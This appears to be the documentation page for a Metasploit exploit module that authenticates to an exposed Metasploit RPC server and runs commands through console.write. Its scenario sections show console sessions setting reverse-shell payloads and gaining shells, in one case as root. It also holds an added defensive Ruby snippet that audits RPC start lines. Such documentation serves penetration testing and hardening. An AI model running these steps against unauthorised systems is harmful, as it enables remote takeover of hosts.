## Description

This module connects to a specified Metasploit RPC server and uses the *console.write* procedure to execute operating system commands. Valid credentials are required to access the RPC interface.

## Vulnerable Application

[Metasploit](https://www.rapid7.com/products/metasploit/) is the world's most used penetration testing software. The RPC API can be used to programmatically drive the Metasploit Framework and Metasploit Pro products.

To start the RPC service, run `msfrpcd -U msf -P abc123`; or run `load msgrpc ServerHost=0.0.0.0 ServerPort=55552 User=msf Pass=abc123 SSL=Y` from within msfconsole.

This module has been tested successfully on:

* Metasploit 4.15 on Kali 1.0.6
* Metasploit 4.14 on Kali 2017.1
* Metasploit 4.14 on Windows 7 SP1

Source and Installers:

* [Source Code Repository](https://github.com/rapid7/metasploit-framework)
* [Installers](https://github.com/rapid7/metasploit-framework/wiki/Downloads-by-Version)

## Verification Steps

1. Start `msfconsole`
2. Do: `use exploit/multi/misc/msf_rpc_console`
3. Do: `set RHOST [IP]`
4. Do: `set RPORT [PORT]` (default: `55552`)
5. Do: `set USERNAME [USERNAME]` (default: `msf`)
6. Do: `set PASSWORD [PASSWORD]`
7. Do: `set LHOST [IP]`
8. Do: `run`
9. You should get a session

## Options

**Username**

The username for Metasploit RPC (default: `msf`).

**Password**

The password for the RPC user.
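The `msfrpcd` and `load msgrpc` start lines shown under Vulnerable Application decide who can reach the console.write path this module relies on. As an added example that is not part of this module or of Metasploit itself, the Ruby below parses either start line and flags the settings that widen exposure (bind address, SSL, the documentation default credentials); it assumes that msfrpcd's `-a` is the bind address, `-p` the port and `-S` disables SSL, and it leaves unspecified values absent rather than guessing defaults.

```ruby
# Added example (not the module's or Metasploit's own code): audit an msfrpcd
# or msgrpc start line for settings that widen exposure of the RPC console.
DOC_USER = 'msf'.freeze      # defaults used throughout this module's docs
DOC_PASS = 'abc123'.freeze
# Parse "msfrpcd -U USER -P PASS [-a ADDR] [-p PORT] [-S]" or
# "load msgrpc ServerHost=... ServerPort=... User=... Pass=... SSL=Y|N".
# Assumed flag meanings: -a bind address, -p port, -S disables SSL.
# Values that are not given explicitly are left absent, not defaulted.
def parse_rpc_start_line(line)
  argv = line.strip.split(/\s+/)
  cfg = {}
  if argv.first == 'msfrpcd'
    flags = { '-U' => :user, '-P' => :pass, '-a' => :host, '-p' => :port }
    argv[1..-1].each_with_index do |tok, i|
      if flags.key?(tok)
        cfg[flags[tok]] = argv[i + 2]   # the value follows the flag
      elsif tok == '-S'
        cfg[:ssl] = false
      end
    end
  elsif argv[0, 2] == %w[load msgrpc]
    keys = { 'serverhost' => :host, 'serverport' => :port,
             'user' => :user, 'pass' => :pass }
    argv[2..-1].each do |tok|
      k, v = tok.split('=', 2)
      next if v.nil?
      if k.casecmp?('ssl')
        cfg[:ssl] = %w[y yes true].include?(v.downcase)
      elsif keys.key?(k.downcase)
        cfg[keys[k.downcase]] = v
      end
    end
  else
    raise ArgumentError, "not an msfrpcd or msgrpc start line: #{line}"
  end
  cfg
end
# Return the findings for a parsed start line; an empty array means none.
def audit_rpc_config(cfg)
  findings = []
  findings << 'RPC bound to all interfaces (0.0.0.0)' if cfg[:host] == '0.0.0.0'
  findings << 'SSL disabled' if cfg[:ssl] == false
  findings << 'documentation default username (msf)' if cfg[:user] == DOC_USER
  if cfg[:pass] == DOC_PASS
    findings << 'documentation default password (abc123)'
  elsif cfg[:pass] && cfg[:pass].length < 12
    findings << 'short RPC password'
  end
  findings
end
```

Run `audit_rpc_config(parse_rpc_start_line('load msgrpc ServerHost=0.0.0.0 ServerPort=55552 User=msf Pass=abc123 SSL=Y'))` to see the three findings the page's own example line produces.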
## Scenarios

### Ruby Target

```
msf > use exploit/multi/misc/msf_rpc_console
msf exploit(msf_rpc_console) > set rhost 172.16.191.166
rhost => 172.16.191.166
msf exploit(msf_rpc_console) > set username msf
username => msf
msf exploit(msf_rpc_console) > set password abc123
password => abc123
msf exploit(msf_rpc_console) > set lhost 172.16.191.181
lhost => 172.16.191.181
msf exploit(msf_rpc_console) > set target 0
target => 0
msf exploit(msf_rpc_console) > run

[*] Started reverse TCP handler on 172.16.191.181:4444
[+] 172.16.191.166:55552 - Authenticated successfully
[*] 172.16.191.166:55552 - Metasploit 4.14.28-dev
[*] 172.16.191.166:55552 - Ruby 2.3.3 x64-mingw32 2016-11-21
[*] 172.16.191.166:55552 - API version 1.0
[+] 172.16.191.166:55552 - Created console #0
[*] 172.16.191.166:55552 - Sending payload...
[*] Command shell session 1 opened (172.16.191.181:4444 -> 172.16.191.166:52984) at 2017-07-05 03:40:50 -0400

whoami
win-sgbsd5tqutq\user
```

### Windows CMD Target

```
msf > use exploit/multi/misc/msf_rpc_console
msf exploit(msf_rpc_console) > set rhost 172.16.191.166
rhost => 172.16.191.166
msf exploit(msf_rpc_console) > set username msf
username => msf
msf exploit(msf_rpc_console) > set password abc123
password => abc123
msf exploit(msf_rpc_console) > set lhost 172.16.191.181
lhost => 172.16.191.181
msf exploit(msf_rpc_console) > set target 1
target => 1
msf exploit(msf_rpc_console) > set payload cmd/windows/powershell_reverse_tcp
payload => cmd/windows/powershell_reverse_tcp
msf exploit(msf_rpc_console) > run

[*] Started reverse SSL handler on 172.16.191.181:4444
[+] 172.16.191.166:55552 - Authenticated successfully
[*] 172.16.191.166:55552 - Metasploit 4.14.28-dev
[*] 172.16.191.166:55552 - Ruby 2.3.3 x64-mingw32 2016-11-21
[*] 172.16.191.166:55552 - API version 1.0
[+] 172.16.191.166:55552 - Created console #1
[*] 172.16.191.166:55552 - Sending payload...
[*] Powershell session session 2 opened (172.16.191.181:4444 -> 172.16.191.166:52996) at 2017-07-05 03:44:05 -0400

Windows PowerShell running as user user on WIN-SGBSD5TQUTQ
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\metasploit>whoami
win-sgbsd5tqutq\user
```

### Unix CMD Target

```
msf > use exploit/multi/misc/msf_rpc_console
msf exploit(msf_rpc_console) > set rhost 172.16.191.215
rhost => 172.16.191.215
msf exploit(msf_rpc_console) > set username msf
username => msf
msf exploit(msf_rpc_console) > set password abc123
password => abc123
msf exploit(msf_rpc_console) > set lhost 172.16.191.181
lhost => 172.16.191.181
msf exploit(msf_rpc_console) > set target 2
target => 2
msf exploit(msf_rpc_console) > set payload cmd/unix/reverse_python
payload => cmd/unix/reverse_python
msf exploit(msf_rpc_console) > run

[*] Started reverse TCP handler on 172.16.191.181:4444
[+] 172.16.191.215:55552 - Authenticated successfully
[*] 172.16.191.215:55552 - Metasploit 4.15.0-dev-aceeedc
[*] 172.16.191.215:55552 - Ruby 2.3.0 x86_64-linux 2015-12-25
[*] 172.16.191.215:55552 - API version 1.0
[+] 172.16.191.215:55552 - Created console #0
[*] 172.16.191.215:55552 - Sending payload...
[*] Command shell session 3 opened (172.16.191.181:4444 -> 172.16.191.215:40768) at 2017-07-05 03:46:11 -0400

id
uid=0(root) gid=0(root) groups=0(root)
```